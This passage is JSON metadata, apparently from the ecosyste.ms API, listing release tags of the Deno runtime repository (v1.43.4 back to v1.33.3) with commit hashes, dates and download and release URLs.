purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","t